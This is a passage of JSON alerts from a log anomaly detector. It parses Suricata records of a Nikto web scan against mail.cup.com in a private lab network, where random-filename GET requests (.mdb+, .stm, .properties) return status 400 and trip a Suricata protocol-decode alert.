"AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.mdb+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.287764+0000\",\"flow_id\":2181886319943873,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46894,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.287764, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2181886319943873,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46894,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46894,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.mdb+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.mdb+\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.mdb+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.mdb+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46894,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46894, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2181886319943873,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2181886319943873, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.287764+0000\",\"flow_id\":2181886319943873,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46894,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.29 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.294012 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46896 -> 192.168.10.154:80", "/parser/model/time": 1583349514.294012, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46896, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.294012 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46896 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.29 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.stm", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.294206+0000\",\"flow_id\":2017848634013862,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46896,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.294206, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2017848634013862,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46896,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46896,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.stm\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.stm\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.stm", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.stm", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46896,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46896, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2017848634013862,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2017848634013862, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.294206+0000\",\"flow_id\":2017848634013862,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46896,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.29 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.296158 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46898 -> 192.168.10.154:80", "/parser/model/time": 1583349514.296158, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46898, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.296158 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46898 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.properties", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.296395+0000\",\"flow_id\":2059741745021279,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46898,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.properties\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.properties\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.296395, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2059741745021279,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46898,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.properties\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.properties\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46898,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.properties\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.properties\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.properties\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.properties\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.properties", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.properties", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46898,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46898, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2059741745021279,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2059741745021279, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.296395+0000\",\"flow_id\":2059741745021279,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46898,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.properties\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.properties\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.298422 [**] 